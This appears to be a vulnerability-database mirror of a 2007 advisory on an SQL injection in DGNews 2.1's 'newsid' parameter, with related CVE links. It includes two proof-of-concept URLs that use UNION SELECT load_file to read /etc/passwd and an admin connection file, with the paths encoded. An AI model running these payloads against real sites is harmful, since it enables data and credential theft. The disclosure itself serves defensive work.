Lucene search
Laurent gaffieEDB-ID:30099HistoryMay 28, 2007 - 12:00 a.m.
DGNews 2.1 - 'NewsID' SQL Injection
2007-05-2800:00:00
laurent gaffie
www.exploit-db.com
43
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/24212/info
DGNews is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
Successful exploits could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
DGNews 2.1 is reported vulnerable; other versions may also be affected.
http://www.example.com/news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7%20from%2
0news_comment
http://www.example.com/news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E657
7732F61646D696E2F636F6E6E2E706870),4,5,6,7%20from%20news_comment Related
securityvulns
securityvulns
DGNews version 2.1 SQL Injection Vulnerability
2007-05-29 00:00:00
cve
cve
CVE-2007-0693
2007-05-30 20:30:00
CVE-2007-2994
2007-06-04 17:30:00
prion
prion
Sql injection
2007-05-30 20:30:00
Sql injection
2007-06-04 17:30:00
nvd
nvd
CVE-2007-0693
2007-05-30 20:30:00
CVE-2007-2994
2007-06-04 17:30:00
cvelist
cvelist
CVE-2007-0693
2007-05-30 20:00:00
CVE-2007-2994
2007-06-04 17:00:00
exploitdb
exploitdb
DGNews 1.5.1/2.1 - 'news.php' SQL Injection
2007-05-28 00:00:00